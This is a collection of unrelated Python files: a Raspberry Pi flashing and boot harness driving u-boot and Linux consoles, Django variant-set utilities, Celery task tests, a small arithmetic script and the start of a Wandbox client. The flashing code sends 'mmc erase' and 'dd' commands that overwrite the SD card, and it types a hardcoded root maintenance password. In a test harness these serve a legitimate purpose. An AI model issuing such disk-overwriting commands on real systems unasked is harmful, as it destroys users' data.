        common.print_bold("\n===== Flashing bootloader (and u-boot) =====\n")
        filename = self.prepare_file(uboot)
        size = self.tftp_get_file_uboot(self.uboot_ddr_addr, filename)
        self.sendline("mmc part")
        # get offset of ext (83) partition after a fat (0c) partition
        self.expect(r"\r\n\s+\d+\s+(\d+)\s+(\d+).*0c( Boot)?\r\n")
        start = hex(int(self.match.groups()[0]))
        if int(size) != int(self.match.groups()[1]) * 512:
            raise Exception("Partition size does not match, refusing to flash")
        self.expect(self.uprompt)
        # mmc erase/write operate on 512-byte sectors, hence size // 512.
        count = hex(int(size / 512))
        self.sendline("mmc erase %s %s" % (start, count))
        self.expect(self.uprompt)
        self.sendline("mmc write %s %s %s" %
                      (self.uboot_ddr_addr, start, count))
        self.expect(self.uprompt, timeout=120)
        self.reset()
        self.wait_for_boot()
        self.setup_uboot_network()
    def flash_rootfs(self, ROOTFS):
        """Flash the Raspberry pi board with the ROOTFS (which in general is a patch update on the firmware).
        :param ROOTFS: Indicates the absolute location of the file to be used to flash.
        :type ROOTFS: string
        """
        common.print_bold("\n===== Flashing rootfs =====\n")
        filename = self.prepare_file(ROOTFS)
        size = self.tftp_get_file_uboot(self.uboot_ddr_addr,
                                        filename,
                                        timeout=220)
        self.sendline("mmc part")
        # get offset of ext (83) partition after a fat (0c) partition
        self.expect(r"0c( Boot)?\r\n\s+\d+\s+(\d+)\s+(\d+).*83\r\n")
        start = hex(int(self.match.groups()[-2]))
        sectors = int(self.match.groups()[-1])
        self.expect(self.uprompt)
        # increase partition size if required
        if int(size) > (sectors * 512):
            # Read the MBR (sector 0) into DDR so the partition table can be
            # edited in memory with u-boot's `mm` and written back.
            self.sendline("mmc read %s 0 1" % self.uboot_ddr_addr)
            self.expect(self.uprompt)
            # NOTE(review): 0x1da looks like the offset of partition 2's
            # sector-count field within the MBR -- confirm against the layout.
            gp2_sz = int(self.uboot_ddr_addr, 16) + int("0x1da", 16)
            self.sendline("mm 0x%08x" % gp2_sz)
            self.expect("%08x: %08x ?" % (gp2_sz, sectors))
            # pad 100M
            self.sendline("0x%08x" % int((int(size) + 104857600) / 512))
            self.sendcontrol("c")
            self.sendcontrol("c")
            self.expect(self.uprompt)
            # Flush the console state before continuing.
            self.sendline("echo FOO")
            self.expect_exact("echo FOO")
            self.expect_exact("FOO")
            self.expect(self.uprompt)
            self.sendline("mmc write %s 0 1" % self.uboot_ddr_addr)
            self.expect(self.uprompt)
            self.sendline("mmc rescan")
            self.expect(self.uprompt)
            self.sendline("mmc part")
            self.expect(self.uprompt)
        count = hex(int(size / 512))
        self.sendline("mmc erase %s %s" % (start, count))
        self.expect(self.uprompt)
        self.sendline("mmc write %s %s %s" %
                      (self.uboot_ddr_addr, start, count))
        self.expect_exact("mmc write %s %s %s" %
                          (self.uboot_ddr_addr, start, count))
        self.expect(self.uprompt, timeout=480)
    def flash_linux(self, KERNEL):
        """Flash the Raspberry pi board with a file downloaded using TFTP protocol.
        :param KERNEL: Indicates the absolute location of the file to be used to flash.
        :type KERNEL: string
        """
        common.print_bold("\n===== Flashing linux =====\n")
        filename = self.prepare_file(KERNEL)
        self.tftp_get_file_uboot(self.uboot_ddr_addr, filename)
        # Remember the kernel filename; boot_linux() uses it in bootcmd.
        self.kernel_file = os.path.basename(KERNEL)
        self.sendline("fatwrite mmc 0 %s %s $filesize" %
                      (self.kernel_file, self.uboot_ddr_addr))
        self.expect(self.uprompt)
    def flash_meta(self, META, wan, lan):
        """Flash an openembedded-core to RPi. (Flashes a combine signed image using TFTP).
        :param META: Indicates the absolute location of the file to be used to flash.
        :type META: string
        :param wan: Indicates the wan device to be used
        :type wan: object
        :param lan: Indicates the lan device to be used
        :type lan: object
        """
        print("\n===== Updating entire SD card image =====\n")
        # must start before we copy as it erases files
        wan.start_tftp_server()
        filename = self.prepare_file(META,
                                     tserver=wan.config["ipaddr"],
                                     tport=wan.config.get("port", "22"))
        wan_ip = wan.get_interface_ipaddr("eth1")
        # Sanity check that the board can reach the TFTP server first.
        self.sendline("ping -c1 %s" % wan_ip)
        self.expect_exact(
            "1 packets transmitted, 1 packets received, 0% packet loss")
        self.expect(self.prompt)
        self.sendline("cd /tmp")
        self.expect(self.prompt)
        self.sendline(" tftp -g -r %s 10.0.1.1" % filename)
        self.expect(self.prompt, timeout=500)
        # Drop to single-user rescue mode so the rootfs can be remounted
        # read-only and overwritten with dd.
        self.sendline("systemctl isolate rescue.target")
        if 0 == self.expect([
                "Give root password for maintenance",
                "Welcome Press Enter for maintenance",
                "Press Enter for maintenance",
        ]):
            self.sendline("password")
        else:
            self.sendline()
        self.expect_exact("sh-3.2# ")
        self.sendline("cd /tmp")
        self.expect_exact("sh-3.2# ")
        self.sendline("mount -no remount,ro /")
        self.expect_exact("sh-3.2# ")
        self.sendline("dd if=$(basename %s) of=/dev/mmcblk0 && sync" %
                      filename)
        self.expect(pexpect.TIMEOUT, timeout=120)
        self.reset()
        self.wait_for_boot()
        # we need to update bootargs, should be doing this at build time
        self.boot_linux()
        self.wait_for_linux()
    def wait_for_linux(self):
        """Reboot the device waits for the menu.
        This method disables Device.DeviceInfo.X_RDKCENTRAL-COM_CaptivePortalEnable
        (sets it to false) and reboots when it was not already disabled.
        """
        super(RPI, self).wait_for_linux()
        self.sendline("cat /etc/issue")
        if 0 == self.expect(["OpenEmbedded"] + self.prompt):
            # Plain OpenEmbedded image: no routing, single wan interface.
            self.routing = False
            self.wan_iface = "eth0"
            self.lan_iface = None
            self.expect(self.prompt)
        self.sendline(
            "dmcli eRT getv Device.DeviceInfo.X_RDKCENTRAL-COM_CaptivePortalEnable"
        )
        if (self.expect([
                " type: bool, value: false",
                "dmcli: not found"
        ] + self.prompt) > 1):
            self.sendline(
                "dmcli eRT setv Device.DeviceInfo.X_RDKCENTRAL-COM_CaptivePortalEnable bool false"
            )
            self.expect(self.prompt)
            self.sendline("reboot")
            super(RPI, self).wait_for_linux()
    def boot_linux(self, rootfs=None, bootargs=""):
        """Boots the RPi's OS.
        :param rootfs: Indicates the rootsfs image path if needs to be loaded (parameter to be used at later point), defaults to None.
        :type rootfs: NA
        :param bootargs: Indicates the boot parameters to be specified if any (parameter to be used at later point), defaults to empty string "".
        :type bootargs: string
        """
        common.print_bold("\n===== Booting linux for %s =====" % self.model)
        self.sendline("fdt addr $fdt_addr")
        self.expect(self.uprompt)
        # Pull the firmware-provided bootargs from the device tree and append
        # any caller-supplied args to them.
        self.sendline("fdt get value bcm_bootargs /chosen bootargs")
        self.expect(self.uprompt)
        self.sendline('setenv bootargs "$bcm_bootargs %s"' % bootargs)
        self.expect(self.uprompt)
        self.sendline(
            "setenv bootcmd 'fatload mmc 0 ${kernel_addr_r} %s; bootm ${kernel_addr_r} - ${fdt_addr}; booti ${kernel_addr_r} - ${fdt_addr}'"
            % getattr(self, "kernel_file", "uImage"))
        self.expect(self.uprompt)
        self.sendline("saveenv")
        self.expect(self.uprompt)
        self.sendline("boot")
        # Linux handles serial better ?
        self.delaybetweenchar = None
| StarcoderdataPython |
3230720 | """
Utility methods for manipulating variant sets.
"""
from collections import defaultdict
import re
from django.core.exceptions import ObjectDoesNotExist
import pyinter
from main.constants import UNDEFINED_STRING
from main.models import ExperimentSample
from main.models import Variant
from main.models import VariantSet
from main.models import VariantToVariantSet
from variants.materialized_variant_filter import lookup_variants
from variants.melted_variant_schema import MELTED_SCHEMA_KEY__ES_UID
from variants.melted_variant_schema import MELTED_SCHEMA_KEY__UID
MODIFY_VARIANT_SET_MEMBERSHIP__ADD = 'add'
MODIFY_VARIANT_SET_MEMBERSHIP__REMOVE = 'remove'

# The set of actions update_variant_in_set_memberships() understands.
VALID_ACTIONS = {
    MODIFY_VARIANT_SET_MEMBERSHIP__ADD,
    MODIFY_VARIANT_SET_MEMBERSHIP__REMOVE,
}

# Lenient regex that matches uids.
# BUGFIX: raw string -- '\w' in a plain string is an invalid escape
# sequence (DeprecationWarning, and an error in future Python versions).
UID_REGEX = re.compile(r'\w+')
def update_variant_in_set_memberships(ref_genome, uid_data_str_list,
        action, variant_set_uid):
    """Modifies the memberships of the given list of variant/sample objects
    in the given VariantSet.
    Args:
        ref_genome: Used to verify ownership of contained
            entities. Clients of this method must confirm that the requestor
            has permissions to modify this ReferenceGenome.
        uid_data_str_list: A list of strings, each of one of two possible forms:
            * "variant_uid"
            * "variant_uid, sample_uid"
        action: The action to perform.
        variant_set_uid: The set to add the variant to.
    Expected exceptions are caught and reported in the response object.
    Returns:
        A dictionary containing information about how the request was handled.
        This is ultimately returned to the UI to show the client a message.
        Contains the following keys:
            * alert_type: Type of message. Either 'info', 'error', or 'warn'.
            * alert_msg: Additional information shown to the user.
    """
    # Cheap structural validation before touching the database.
    validation_result = _initial_validation(
            uid_data_str_list, action)
    if validation_result['alert_type'] == 'error':
        return validation_result
    # Make sure that the VariantSet is valid.
    # Filtering on reference_genome doubles as the permission check.
    try:
        variant_set = VariantSet.objects.get(
                reference_genome=ref_genome,
                uid=variant_set_uid)
    except ObjectDoesNotExist:
        return {
            'alert_type': 'error',
            'alert_msg': 'Variant Set does not exist or insufficient permissions.'
        }
    # Convert to object interface to help clarify further processing.
    grouped_uid_dict_list = _convert_pair_list_into_object_list(
            uid_data_str_list)
    # Get helper objects for the query (batched, two DB reads total).
    (variant_uid_to_obj_map, sample_uid_to_obj_map) = (
            _get_cached_uid_to_object_maps(ref_genome, grouped_uid_dict_list))
    # Perform modification.
    if action == MODIFY_VARIANT_SET_MEMBERSHIP__ADD:
        _perform_add(grouped_uid_dict_list, variant_set,
                variant_uid_to_obj_map, sample_uid_to_obj_map)
    else: # action == MODIFY_VARIANT_SET_MEMBERSHIP__REMOVE
        _perform_remove(grouped_uid_dict_list, variant_set,
                variant_uid_to_obj_map, sample_uid_to_obj_map)
    # These actions invalidate the materialized view.
    ref_genome.invalidate_materialized_view()
    # Return success response if we got here.
    return {
        'alert_type': 'info',
        'alert_msg': 'success'
    }
def update_variant_in_set_memberships__all_matching_filter(ref_genome,
        action, variant_set_uid, filter_string, is_melted):
    """Updates VariantSet membership for all matching filter.

    Runs the variant filter, converts each result row into the
    '<variant_uid>[,<sample_uid>]' form expected by
    update_variant_in_set_memberships(), and delegates to it.
    """
    query_args = {
        'filter_string': filter_string,
        'is_melted': is_melted,
    }
    lookup_variant_result = lookup_variants(query_args, ref_genome)
    variant_list = lookup_variant_result.result_list
    # Convert the variant result into the form that the update function
    # requires, list of '<variant_uid>' or '<variant_uid>,<sample_uid>'.
    uid_data_str_list = []
    for row in variant_list:
        data_str = row[MELTED_SCHEMA_KEY__UID]
        # Only attach a sample uid when the row holds a single concrete
        # value (skip missing keys, lists, and None).
        if (MELTED_SCHEMA_KEY__ES_UID in row and
                not isinstance(row[MELTED_SCHEMA_KEY__ES_UID], list) and
                not row[MELTED_SCHEMA_KEY__ES_UID] is None):
            data_str += ',' + row[MELTED_SCHEMA_KEY__ES_UID]
        uid_data_str_list.append(data_str)
    return update_variant_in_set_memberships(
            ref_genome, uid_data_str_list, action, variant_set_uid)
def add_variants_to_set_from_bed(sample_alignment, bed_dataset):
    """
    Given a bed with feature names and a corresponding sample alignment,
    create new variant sets for every unique feature name and assign variants
    that fall within these features to the new sets.
    E.g. BED:
        ...
        NC_000913 223514 223534 POOR_MAPPING_QUALITY
        NC_000913 223542 223734 NO_COVERAGE
        NC_000913 223751 224756 POOR_MAPPING_QUALITY
        ...
    Add variants in 223542-223734 to NO_COVERAGE
    Add variants in 223751-224756 and 223514-223534 to POOR_MAPPING_QUALITY

    Returns:
        Dict mapping each created/updated VariantSet to the list of
        Variants added to it.
    """
    # Read in the bed file
    bed_dataset_fn = bed_dataset.get_absolute_location()
    reference_genome = sample_alignment.alignment_group.reference_genome
    experiment_sample = sample_alignment.experiment_sample
    # 1. Create a dictionary of disjoint intervals, recursive defaultdict:
    #    feature name -> chromosome label -> IntervalSet.
    feature_disj_intervals = defaultdict(
            lambda: defaultdict(pyinter.IntervalSet))
    variants_to_add = defaultdict(list)
    with open(bed_dataset_fn) as bed_dataset_fh:
        for i, line in enumerate(bed_dataset_fh):
            try:
                chrom, start, end, feature = line.strip().split('\t')
                # make a new interval from start to end
                new_ivl = pyinter.closedopen(int(start), int(end))
                # add new ivl to old ivls
                feature_disj_intervals[feature][chrom].add(new_ivl)
            except ValueError:
                # BUGFIX: the original did `print(...) % (i, line)`, which
                # applies '%' to print()'s None return value and raises a
                # TypeError on Python 3.  Also narrowed the bare except to
                # ValueError (raised by both the 4-way unpack and int()).
                print('WARNING: Callable Loci line '
                      '%d: (%s) couldnt be parsed.' % (i, line))
    # 2. Associate variants with these intervals
    variants = Variant.objects.filter(
            variantcallercommondata__alignment_group=
                    sample_alignment.alignment_group)
    for v in variants:
        for feat, chrom_ivls in feature_disj_intervals.items():
            # Skip if there is no interval in this chromosome
            if v.chromosome.label not in chrom_ivls: continue
            if not chrom_ivls[v.chromosome.label]: continue
            if v.position in chrom_ivls[v.chromosome.label]:
                variants_to_add[feat].append(v)
    # 3. Make new variant sets for any features with variants,
    # and add the variants to them.
    variant_set_to_variant_map = {}
    for feat, variants in variants_to_add.items():
        (feat_variant_set, created) = VariantSet.objects.get_or_create(
                reference_genome=reference_genome,
                label=feat)
        grouped_uid_dict_list = [{
                'sample_uid': experiment_sample.uid,
                'variant_uid': v.uid} for v in variants]
        variant_uid_to_obj_map = dict([(v.uid, v) for v in variants])
        sample_uid_to_obj_map = {experiment_sample.uid: experiment_sample}
        _perform_add(grouped_uid_dict_list, feat_variant_set,
                variant_uid_to_obj_map, sample_uid_to_obj_map)
        variant_set_to_variant_map[feat_variant_set] = variants
    return variant_set_to_variant_map
def _initial_validation(uid_data_str_list, action):
    """Initial validation, or why statically compiled languages have their
    upsides.

    Checks that *action* is one of VALID_ACTIONS and that every entry of
    *uid_data_str_list* has the form '<variant_uid>' or
    '<variant_uid>,<sample_uid>'.

    Returns:
        Dict with 'alert_type' / 'alert_msg'; alert_type == 'error'
        indicates validation failure.
    """
    # Make sure we have a valid action.
    # (idiomatic `not in` instead of `not action in`)
    if action not in VALID_ACTIONS:
        return {
            'alert_type': 'error',
            'alert_msg': 'Bad action type: %s' % action
        }
    # Make sure uid_data_str_list is properly formatted.
    for uid_data_str in uid_data_str_list:
        parts = uid_data_str.split(',')
        if not (0 < len(parts) <= 2):
            return {
                'alert_type': 'error',
                'alert_msg': 'Bad variant uid / sample uid pair: %s' % uid_data_str
            }
    # All good. Return filler message.
    return {
        'alert_type': 'info',
        'alert_msg': 'Validation passed.'
    }
def _convert_pair_list_into_object_list(uid_data_str_list):
    """Converts the list of pairs into a list of objects with keys:
        * variant_uid
        * sample_uid

    A missing or non-uid-looking sample part becomes UNDEFINED_STRING.
    """
    result = []
    for data_str in uid_data_str_list:
        parts = data_str.split(',')
        variant_uid = parts[0]
        sample_uid = parts[1] if len(parts) > 1 else ''
        if not UID_REGEX.match(sample_uid):
            sample_uid = UNDEFINED_STRING
        result.append({
            'variant_uid': variant_uid,
            'sample_uid': sample_uid,
        })
    return result
def _get_uid_to_db_object_map(model_class, unique_uid_set,
query_kwargs={}):
"""Queries the database for the given list of uids, returning a map from
uid to Python object.
"""
uid_to_obj_map = {}
query_set = model_class.objects.filter(**query_kwargs).filter(
uid__in=unique_uid_set)
for obj in query_set:
uid_to_obj_map[obj.uid] = obj
return uid_to_obj_map
def _get_cached_uid_to_object_maps(ref_genome, grouped_uid_dict_list):
    """Batch-fetch Variants and ExperimentSamples to minimize DB reads.

    Returns:
        (variant_uid_to_obj_map, sample_uid_to_obj_map)
    """
    variant_uids = {group['variant_uid'] for group in grouped_uid_dict_list}
    sample_uids = {
        group['sample_uid']
        for group in grouped_uid_dict_list
        if group['sample_uid'] != UNDEFINED_STRING
    }
    # Scope both queries to the ReferenceGenome / its Project so callers
    # cannot reach entities they do not own.
    variant_map = _get_uid_to_db_object_map(
            Variant, variant_uids, {'reference_genome': ref_genome})
    sample_map = _get_uid_to_db_object_map(
            ExperimentSample, sample_uids, {'project': ref_genome.project})
    return (variant_map, sample_map)
def _perform_add(grouped_uid_dict_list, variant_set, variant_uid_to_obj_map,
        sample_uid_to_obj_map):
    """
    Add each (variant, optional sample) membership to *variant_set*.

    TODO: Instead of looping through variants individually,
    create them in one fell swoop, which will be faster.
    Args:
        grouped_uid_dict_list:
            [ {
                sample_uid: <SOME_SAMPLE_UID>,
                variant_uid: <SOME_VARIANT_UID>}, ...]
        variant_set:
            <variant set obj to add to>
        variant_uid_to_obj_map:
            { <SOME_VARIANT_UID>: <Variant object>, ...}
        sample_uid_to_obj_map:
            { <SOME_SAMPLE_UID>: <ExperimentSample object>, ...}
    """
    for group in grouped_uid_dict_list:
        variant = variant_uid_to_obj_map[group['variant_uid']]
        # get_or_create makes repeated adds idempotent.
        vtvs, created = VariantToVariantSet.objects.get_or_create(
                variant=variant,
                variant_set=variant_set)
        # Maybe add sample association.
        sample_uid = group['sample_uid']
        if sample_uid == UNDEFINED_STRING:
            continue
        vtvs.sample_variant_set_association.add(
                sample_uid_to_obj_map[sample_uid])
def _perform_remove(grouped_uid_dict_list, variant_set,
        variant_uid_to_obj_map, sample_uid_to_obj_map):
    """Remove the requested memberships from *variant_set*.

    Two passes over the same groups:
      1. Drop the explicitly named per-sample associations.
      2. For groups without a sample uid, delete the VariantToVariantSet
         relation entirely once it has no sample associations left.
    """
    for group in grouped_uid_dict_list:
        variant = variant_uid_to_obj_map[group['variant_uid']]
        try:
            vtvs = VariantToVariantSet.objects.get(
                    variant=variant,
                    variant_set=variant_set)
        except ObjectDoesNotExist:
            # It's possible this relation was removed on an earlier
            # iteration.
            # TODO(gleb): Think about what could go wrong here and add
            # tests.
            continue
        sample_uid = group['sample_uid']
        if sample_uid == UNDEFINED_STRING:
            # See next for loop.
            continue
        vtvs.sample_variant_set_association.remove(
                sample_uid_to_obj_map[sample_uid])
    # Iterate again and destroy any VariantToVariantSet that
    # should be completely removed.
    for group in grouped_uid_dict_list:
        variant = variant_uid_to_obj_map[group['variant_uid']]
        try:
            vtvs = VariantToVariantSet.objects.get(
                    variant=variant,
                    variant_set=variant_set)
        except ObjectDoesNotExist:
            # It's possible this relation was removed on an earlier
            # iteration.
            # TODO(gleb): Think about what could go wrong here and add
            # tests.
            continue
        sample_uid = group['sample_uid']
        if sample_uid == UNDEFINED_STRING:
            if vtvs.sample_variant_set_association.count() == 0:
                vtvs.delete()
| StarcoderdataPython |
5009169 | import time
from datetime import timedelta
from celery.result import AsyncResult
from django.utils import timezone
from requests import HTTPError
from . import UBDCBaseTestWorker
from . import get_fixture
from ..errors import UBDCError, UBDCRetriableError
from ..models import AirBnBResponseTypes
from app.operations import (
op_discover_new_listings_periodical,
op_estimate_listings_or_divide_periodical,
op_update_calendar_periodical,
op_update_listing_details_periodical,
op_update_reviews_periodical,
)
# These tests represent the core ops that beat will run periodically
class TestCoreOps(UBDCBaseTestWorker):
    """End-to-end exercises of the periodic ("beat") operations on a worker."""

    fixtures = [
        get_fixture("EDIN_AOI_SHAPE.json"),
        get_fixture("EDIN_GRID_LISTINGS.json"),
    ]

    def setUp(self):
        self.aoi_id = 1
        self.listing_404 = 30729869
        self.listing_200 = 40197612
        self.quadkey = "03113323321103333"
        from app.models import UBDCGrid
        self.g = UBDCGrid.objects.get(quadkey=self.quadkey)
        # Backdate the last scan so the periodic op treats this grid as stale.
        self.g.datetime_last_estimated_listings_scan = timezone.now() - timedelta(days=10)
        self.g.save()

    def _wait_for_children(self, job, initial_wait=1):
        """Poll until every child task of *job* has finished.

        De-duplicates the sleep/poll loop the tests previously repeated.
        """
        time.sleep(initial_wait)
        while not all(x.ready() for x in job.children):
            print('waiting...')
            time.sleep(1)

    def test_op_discover_new_listings_periodical(self):
        job = op_discover_new_listings_periodical.s().apply_async()
        self._wait_for_children(job)
        # BUGFIX: the task updates the row in the DB, not this in-memory
        # instance; without a reload the assertion would compare against the
        # stale 10-day-old timestamp set in setUp().
        self.g.refresh_from_db()
        self.assertTrue(abs(timezone.now() - self.g.datetime_last_estimated_listings_scan) < timedelta(seconds=20))

    def test_op_estimate_listings_or_divide_periodical(self):
        job = op_estimate_listings_or_divide_periodical.s().apply_async()
        self._wait_for_children(job)

    def test_op_update_calendar_periodical(self):
        job = op_update_calendar_periodical.s(how_many=17_000 * 3).apply_async()
        self._wait_for_children(job)

    def test_op_update_listing_details_periodical(self):
        job = op_update_listing_details_periodical.s().apply_async()
        self._wait_for_children(job, initial_wait=2)

    def test_op_update_reviews_periodical(self):
        job = op_update_reviews_periodical.s(how_many=50).apply_async()
        self._wait_for_children(job)
| StarcoderdataPython |
3383109 | # Multiplication table (from 1 to 10) in Python
# Multiplication table (from 1 to 10) in Python
num = 19
# To take input from the user
# num = int(input("Display multiplication table of? "))
# Iterate 10 times from i = 1 to 10
for i in range(1, 11):
    print(num, 'x', i, '=', num * i)
try:
    print(9 / 0)
except ZeroDivisionError:
    # BUGFIX: catch only the expected error instead of a bare `except:`,
    # which would also swallow unrelated bugs (NameError, KeyboardInterrupt...).
    print("An error has occured, cant be divided by zero")
| StarcoderdataPython |
1819899 | #!/usr/bin/env python
#
# iuwandbox.py
#
# Copyright (C) 2014-2018, <NAME>
# This software is released under the new BSD License,
# see LICENSE
#
import os
import sys
import re
import codecs
import argparse
from time import sleep
from argparse import ArgumentParser
from wandbox import Wandbox
from requests.exceptions import HTTPError
from requests.exceptions import ConnectionError
# Path to the pre-generated single-header ("fused") iutest source.
IUTEST_FUSED_SRC = os.path.normpath(os.path.join(os.path.dirname(__file__), '../../fused-src/iutest.min.hpp'))
# Root of the regular iutest include tree (used to detect iutest headers).
IUTEST_INCLUDE_PATH = os.path.normpath(os.path.join(os.path.dirname(__file__), '../../include'))
# Matches '#include "iutest.hpp"' / '#include "iutest_switch.hpp"' lines.
IUTEST_INCLUDE_REGEX = re.compile(r'^\s*#\s*include\s*".*(iutest|iutest_switch)\.hpp"')
# Matches any local '#include "..."' line, capturing the path.
EXPAND_INCLUDE_REGEX = re.compile(r'^\s*#\s*include\s*"(.*?)"')
# Extracts INCG_IRIS_* include-guard macros from the fused source.
IUTEST_INCG_REGEX = re.compile(r'\s*#\s*define[/\s]*(INCG_IRIS_\S*)\s*')
# Include guards found in the fused source (filled by make_code()).
iutest_incg_list = []
# Enables compiler-specific workarounds sprinkled through this script.
workaround = True
# Wandbox API retry policy; overridden by --retry / --retry-wait.
api_retries = 3
api_retry_wait = 60
# command line option
def parse_command_line():
    """Parse the iuwandbox command line.

    Returns:
        (options, parser): the argparse namespace and the parser itself
        (returned so callers can print help on usage errors).

    Side effects:
        Updates module-level api_retries / api_retry_wait used by the
        Wandbox API retry helpers.
    """
    global api_retries
    global api_retry_wait
    parser = ArgumentParser()
    parser.add_argument(
        '-v',
        '--version',
        action='version',
        version=u'%(prog)s version 5.9'
    )
    parser.add_argument(
        '--list-compiler',
        '--list_compiler',
        action='store_true',
        help='listup compiler.'
    )
    parser.add_argument(
        '--list-options',
        '--list_options',
        metavar='COMPILER',
        help='listup compiler options.'
    )
    parser.add_argument(
        '-c',
        '--compiler',
        default='gcc-head',
        help='compiler select. default: %(default)s'
    )
    parser.add_argument(
        '-x',
        '--options',
        help='used options for a compiler.'
    )
    parser.add_argument(
        '--default',
        action='store_true',
        help='--default option is deprecated. default options are always set.'
    )
    parser.add_argument(
        '--no-default',
        action='store_true',
        help='no set default options.'
    )
    parser.add_argument(
        '--std',
        metavar='VERSION',
        help='set --std options.'
    )
    parser.add_argument(
        '--boost',
        metavar='VERSION',
        help='set boost options version X.XX or nothing.'
    )
    parser.add_argument(
        '--optimize',
        action='store_true',
        help='use optimization.'
    )
    parser.add_argument(
        '--cpp-verbose',
        action='store_true',
        help='use cpp-verbose.'
    )
    parser.add_argument(
        '--sprout',
        action='store_true',
        help='use sprout.'
    )
    parser.add_argument(
        '--msgpack',
        action='store_true',
        help='use msgpack.'
    )
    parser.add_argument(
        '--stdin',
        help='set stdin.'
    )
    parser.add_argument(
        '-f',
        '--compiler-option-raw',
        '--compiler_option_raw',
        metavar='OPTIONS',
        action='append',
        default=['-D__WANDBOX__'],
        help='compile-time any additional options.'
    )
    parser.add_argument(
        '-r',
        '--runtime-option-raw',
        '--runtime_option_raw',
        metavar='OPTIONS',
        action='append',
        help='runtime-time any additional options.'
    )
    parser.add_argument(
        '-s',
        '--save',
        action='store_true',
        help='generate permanent link.'
    )
    parser.add_argument(
        '--permlink',
        metavar='ID',
        help='get permanent link.'
    )
    parser.add_argument(
        '-o',
        '--output',
        metavar='FILE',
        help='output source code.'
    )
    parser.add_argument(
        '--xml',
        metavar='FILE',
        help='output result xml.'
    )
    parser.add_argument(
        '--junit',
        metavar='FILE',
        help='output result junit xml.'
    )
    parser.add_argument(
        '--stderr',
        action='store_true',
        help='output stderr.'
    )
    parser.add_argument(
        '--encoding',
        help='set encoding.'
    )
    parser.add_argument(
        '--expand-include',
        '--expand_include',
        action='store_true',
        help='expand include file.'
    )
    # Hidden option: build via a generated Makefile instead of one TU.
    parser.add_argument(
        '--make',
        action='store_true',
        help=argparse.SUPPRESS
    )
    parser.add_argument(
        '--retry-wait',
        type=int,
        default=api_retry_wait,
        metavar='SECONDS',
        help='Wait time for retry when HTTPError occurs'
    )
    parser.add_argument(
        '--retry',
        type=int,
        default=api_retries,
        metavar='COUNT',
        help='Number of retries when HTTPError occurs'
    )
    parser.add_argument(
        '--check-config',
        '--check_config',
        action='store_true',
        help='check config.'
    )
    parser.add_argument(
        '--iutest-use-main',
        action='store_true',
        help='define IUTEST_USE_MAIN.'
    )
    parser.add_argument(
        '--verbose',
        action='store_true',
        help='verbose.'
    )
    parser.add_argument(
        '--dryrun',
        action='store_true',
        help='dryrun.'
    )
    parser.add_argument(
        'code',
        metavar='CODE',
        nargs='*',
        help='source code file'
    )
    options = parser.parse_args()
    # Propagate retry tuning to the module-level knobs used by wandbox_api_call.
    api_retries = options.retry
    api_retry_wait = options.retry_wait
    return options, parser
# file open
def file_open(path, mode, encoding):
    """Open *path* in *mode*; use codecs.open when an *encoding* is given."""
    if not encoding:
        return open(path, mode)
    return codecs.open(path, mode, encoding)
# make include filename
def make_include_filename(path, includes, included_files):
    """Return a collision-free include filename for *path*.

    Results are cached in *included_files* (abs path -> chosen name).
    Collisions with names already present in *includes* are resolved by
    prefixing parent directory names, e.g. 'dir__file.hpp'.
    """
    cached = included_files.get(path)
    if cached is not None:
        return cached
    parent, name = os.path.split(path)
    while name in includes:
        parent, parent_name = os.path.split(parent)
        name = parent_name + '__' + name
    included_files[path] = name
    return name
def is_iutest_included_file(filepath):
    """True when *filepath* is an iutest header whose include guard is
    already present in the fused source (so it need not be attached)."""
    if not os.path.abspath(filepath).startswith(IUTEST_INCLUDE_PATH):
        return False
    guard = 'INCG_IRIS_' + os.path.basename(filepath).upper().replace('.', '_')
    return any(incg.startswith(guard) for incg in iutest_incg_list)
# make code
def make_code(path, encoding, expand, includes, included_files):
    """Read *path* and return its source with iutest includes rewritten.

    - '#include "iutest.hpp"' lines are replaced with a reference to the
      fused single-header, which is loaded once into includes['iutest.hpp']
      (also populating the global iutest_incg_list of include guards).
    - Other local '#include "..."' lines are either expanded inline
      (expand=True) or registered in *includes* under a collision-free name.
      The original line is preserved behind a '//origin>> ' marker.

    Args:
        path: source file to read.
        encoding: optional encoding passed to file_open().
        expand: inline included files instead of attaching them.
        includes: dict filename -> code; mutated with attached files.
        included_files: dict abs-path -> chosen filename (collision cache).
    """
    code = ''
    file = file_open(path, 'r', encoding)
    for line in file:
        m = IUTEST_INCLUDE_REGEX.match(line)
        if m:
            code += '#include "iutest.hpp"\n'
            code += '//origin>> ' + line
            if 'iutest.hpp' not in includes:
                try:
                    # Fused source is generated with a UTF-8 BOM.
                    f = codecs.open(IUTEST_FUSED_SRC, 'r', 'utf-8-sig')
                    iutest_src = f.read()
                    f.close()
                    includes['iutest.hpp'] = iutest_src
                    global iutest_incg_list
                    iutest_incg_list = IUTEST_INCG_REGEX.findall(iutest_src)
                except:
                    print('{0} is not found...'.format(IUTEST_FUSED_SRC))
                    print('please try \"make fused\"')
                    exit(1)
        else:
            m = EXPAND_INCLUDE_REGEX.match(line)
            if m:
                include_path = os.path.normpath(os.path.join(os.path.dirname(path), m.group(1)))
                if is_iutest_included_file(include_path):
                    # Header already covered by the fused source; comment out.
                    code += '//origin>> '
                elif os.path.exists(include_path):
                    if expand:
                        expand_include_file_code = make_code(
                                include_path, encoding, expand, includes, included_files)
                        code += expand_include_file_code
                        code += '//origin>> '
                    else:
                        include_abspath = os.path.abspath(include_path)
                        include_filename = make_include_filename(
                                include_abspath, includes, included_files)
                        if not include_filename == include_path:
                            # Name was rewritten; emit the new include line.
                            code += '#include "' + include_filename + '"\n'
                            code += '//origin>> '
                        if include_filename not in includes:
                            # Reserve the slot first to stop infinite
                            # recursion on circular includes.
                            includes[include_filename] = ''
                            expand_include_file_code = make_code(
                                    include_path, encoding, expand, includes, included_files)
                            includes[include_filename] = expand_include_file_code
        code += line
    file.close()
    return code
def print_undefined_option(option_name, compiler):
    # Report an option string the selected Wandbox compiler does not accept.
    print('Wandbox is not supported option [{0}] ({1})'.format(option_name, compiler))
def change_std_option(options, new_value):
    """Replace options.std with *new_value*, logging the change."""
    old_value = options.std
    options.std = new_value
    print(' change std option: {0} -> {1}'.format(old_value, new_value))
def check_std_option_compatible(options, old, new, optlist):
    """If options.std uses one spelling of a standard but only the other is
    in *optlist*, switch to the supported spelling and return True."""
    for unsupported, supported in ((old, new), (new, old)):
        if options.std == unsupported and supported in optlist:
            print(' [{0}] is not supported option. you can use [{1}]'.format(
                unsupported, supported))
            change_std_option(options, supported)
            return True
    return False
# check config
def check_config(options):
    """Validate compiler / options / std against what Wandbox supports.

